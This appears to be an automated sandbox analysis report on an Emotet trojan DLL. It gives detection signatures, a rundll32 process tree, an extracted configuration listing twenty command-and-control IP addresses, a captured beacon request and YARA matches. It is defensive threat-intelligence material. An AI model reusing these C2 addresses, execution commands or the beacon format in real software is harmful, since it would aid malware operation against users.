Loading ...

Play interactive tourEdit tour

Windows Analysis Report qrb6jVwzoe

Overview

General Information

Sample Name:qrb6jVwzoe (renamed file extension from none to dll)
Analysis ID:528000
MD5:56547488fb182b73f83211903ce2dd30
SHA1:e3c962932fb99e7685ea989356d60afc4045c52f
SHA256:bf0cadbc8a6b28a54eb0db5f2afe582a02d5f1dedb058097abc1d7b43ba7deb0
Tags:32dllexetrojan
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Emotet RunDLL32 Process Creation
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains strange resources
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7156 cmdline: loaddll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 4716 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 580 cmdline: rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6240 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\qrb6jVwzoe.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5184 cmdline: rundll32.exe C:\Users\user\Desktop\qrb6jVwzoe.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 6228 cmdline: rundll32.exe C:\Users\user\Desktop\qrb6jVwzoe.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6416 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mkjhtkxzcnwc\pevpdfyikq.vhc",mHan MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • rundll32.exe (PID: 6376 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mkjhtkxzcnwc\pevpdfyikq.vhc",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 6100 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5896 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6932 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7096 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6320 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.359659135.0000000000FA6000.00000004.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000005.00000002.363179746.0000000000B42000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000005.00000003.359231508.0000000000B46000.00000004.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000008.00000003.494236269.0000000003233000.00000004.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000006.00000003.359880008.0000000000C16000.00000004.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.3.rundll32.exe.3246c20.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              4.2.rundll32.exe.fa6a40.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                8.3.rundll32.exe.3246c20.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  7.2.rundll32.exe.f66ce0.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    8.3.rundll32.exe.3246c20.2.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 17 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Emotet RunDLL32 Process CreationShow sources
                      Source: Process startedAuthor: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mkjhtkxzcnwc\pevpdfyikq.vhc",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mkjhtkxzcnwc\pevpdfyikq.vhc",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mkjhtkxzcnwc\pevpdfyikq.vhc",mHan, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 6416, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mkjhtkxzcnwc\pevpdfyikq.vhc",Control_RunDLL, ProcessId: 6376

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 8.3.rundll32.exe.3246c20.1.raw.unpackMalware Configuration Extractor: Emotet {"Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}
                      Machine Learning detection for sampleShow sources
                      Source: qrb6jVwzoe.dllJoe Sandbox ML: detected
                      Source: qrb6jVwzoe.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.6:49755 version: TLS 1.2
                      Source: qrb6jVwzoe.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F32188A FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F32188A FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10011A80 FindFirstFileW,

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.6:49755 -> 51.178.61.60:443
                      Source: TrafficSnort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.6:49756 -> 168.197.250.14:80
                      Source: TrafficSnort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.6:49757 -> 45.79.33.48:8080
                      Source: TrafficSnort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.6:49760 -> 196.44.98.190:8080
                      Source: TrafficSnort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.6:49783 -> 177.72.80.14:7080
                      Source: TrafficSnort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 177.72.80.14:7080 -> 192.168.2.6:49783
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 196.44.98.190 144
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.79.33.48 144
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 168.197.250.14 80
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 51.178.61.60 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 177.72.80.14 168
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 51.178.61.60:443
                      Source: Malware configuration extractorIPs: 168.197.250.14:80
                      Source: Malware configuration extractorIPs: 45.79.33.48:8080
                      Source: Malware configuration extractorIPs: 196.44.98.190:8080
                      Source: Malware configuration extractorIPs: 177.72.80.14:7080
                      Source: Malware configuration extractorIPs: 51.210.242.234:8080
                      Source: Malware configuration extractorIPs: 185.148.169.10:8080
                      Source: Malware configuration extractorIPs: 142.4.219.173:8080
                      Source: Malware configuration extractorIPs: 78.47.204.80:443
                      Source: Malware configuration extractorIPs: 78.46.73.125:443
                      Source: Malware configuration extractorIPs: 37.44.244.177:8080
                      Source: Malware configuration extractorIPs: 37.59.209.141:8080
                      Source: Malware configuration extractorIPs: 191.252.103.16:80
                      Source: Malware configuration extractorIPs: 54.38.242.185:443
                      Source: Malware configuration extractorIPs: 85.214.67.203:8080
                      Source: Malware configuration extractorIPs: 54.37.228.122:443
                      Source: Malware configuration extractorIPs: 207.148.81.119:8080
                      Source: Malware configuration extractorIPs: 195.77.239.39:8080
                      Source: Malware configuration extractorIPs: 66.42.57.149:443
                      Source: Malware configuration extractorIPs: 195.154.146.35:443
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: Joe Sandbox ViewASN Name: EcobandGH EcobandGH
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: GET /BCcDzRknSjFPjuOxHLZvVqcO HTTP/1.1Cookie: QMpLEjjFd=c4U8GYO3gBQ2KCd18VNTs9PT8hpdVNqj4zLzgZE1fFI9x0SPtcMipNFNESf8CsAVem5JWMqQ8ndGaJ1DdBO6E5KdfcNjE1YapLmU92FtgBNQbP19LEuO+ya4SHRYKzrZSycrfZTK0DPGNQZNeJ6j1cioezM7bzeTQ/thQoUAbkNL0mgdSgnH4s5+Omur7YLxQg0NgsR41aDxprzsQzXD6m2hLQv3kzo0+dQAtysUr4iTrR26F9NeGzF2zkgnUERUJbSQGPdy5NBtzT8NJyvrR6k15te4INQfbmWwqTBzGbEzsQ==Host: 51.178.61.60Connection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 207.148.81.119 207.148.81.119
                      Source: Joe Sandbox ViewIP Address: 196.44.98.190 196.44.98.190
                      Source: global trafficTCP traffic: 192.168.2.6:49757 -> 45.79.33.48:8080
                      Source: global trafficTCP traffic: 192.168.2.6:49760 -> 196.44.98.190:8080
                      Source: global trafficTCP traffic: 192.168.2.6:49783 -> 177.72.80.14:7080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Nov 2021 15:49:10 GMTContent-Type: text/htmlContent-Length: 162Connection: close
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.178.61.60
                      Source: unknownTCP traffic detected without corresponding DNS query: 168.197.250.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 168.197.250.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 168.197.250.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.79.33.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.79.33.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.79.33.48
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.44.98.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.44.98.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.44.98.190
                      Source: unknownTCP traffic detected without corresponding DNS query: 177.72.80.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 177.72.80.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 177.72.80.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 177.72.80.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 177.72.80.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 177.72.80.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 177.72.80.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 177.72.80.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 177.72.80.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 177.72.80.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 177.72.80.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 177.72.80.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 177.72.80.14
                      Source: svchost.exe, 00000010.00000003.472140574.00000283AB37D000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-23T19:02:05.3195648Z||.||797d024d-8c74-4faa-b6a6-08435801478b||1152921505694213184||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                      Source: svchost.exe, 00000010.00000003.472140574.00000283AB37D000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-23T19:02:05.3195648Z||.||797d024d-8c74-4faa-b6a6-08435801478b||1152921505694213184||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                      Source: svchost.exe, 00000010.00000002.488148840.00000283AB300000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.859918261.0000015DEBE88000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000010.00000002.488035561.00000283AAAEF000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.859918261.0000015DEBE88000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                      Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: svchost.exe, 00000010.00000003.468408043.00000283AB37D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.468696929.00000283AB802000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.469811621.00000283AB374000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 00000015.00000003.859010868.0000015DE68AA000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.859621352.0000015DE68AC000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xml
                      Source: svchost.exe, 00000015.00000003.859010868.0000015DE68AA000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.859621352.0000015DE68AC000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anon
                      Source: svchost.exe, 00000015.00000003.859010868.0000015DE68AA000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.859621352.0000015DE68AC000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration
                      Source: svchost.exe, 00000010.00000003.469811621.00000283AB374000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 00000010.00000003.469811621.00000283AB374000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000010.00000003.469811621.00000283AB374000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 00000010.00000003.469550789.00000283AB39E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.469585503.00000283AB3B3000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_10021027 InternetReadFile,
                      Source: global trafficHTTP traffic detected: GET /BCcDzRknSjFPjuOxHLZvVqcO HTTP/1.1Cookie: QMpLEjjFd=c4U8GYO3gBQ2KCd18VNTs9PT8hpdVNqj4zLzgZE1fFI9x0SPtcMipNFNESf8CsAVem5JWMqQ8ndGaJ1DdBO6E5KdfcNjE1YapLmU92FtgBNQbP19LEuO+ya4SHRYKzrZSycrfZTK0DPGNQZNeJ6j1cioezM7bzeTQ/thQoUAbkNL0mgdSgnH4s5+Omur7YLxQg0NgsR41aDxprzsQzXD6m2hLQv3kzo0+dQAtysUr4iTrR26F9NeGzF2zkgnUERUJbSQGPdy5NBtzT8NJyvrR6k15te4INQfbmWwqTBzGbEzsQ==Host: 51.178.61.60Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.6:49755 version: TLS 1.2

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 8.3.rundll32.exe.3246c20.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.fa6a40.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.3.rundll32.exe.3246c20.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.f66ce0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.3.rundll32.exe.3246c20.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.3.rundll32.exe.3246c20.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.b46c68.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.b46c68.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.c16c78.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.f66ce0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.fa6a40.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.3.rundll32.exe.3246c20.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.c16c78.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.b46c68.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.3246c20.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.3246c20.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.3.rundll32.exe.3246c20.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.c16c78.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.c16c78.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.b46c68.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.b46c68.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.b46c68.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.359659135.0000000000FA6000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.363179746.0000000000B42000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.359231508.0000000000B46000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.494236269.0000000003233000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.359880008.0000000000C16000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.359009454.0000000000B46000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.431973841.0000000003233000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.365562801.0000000000F66000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.382797966.0000000003233000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.877277824.0000000003233000.00000004.00000001.sdmp, type: MEMORY
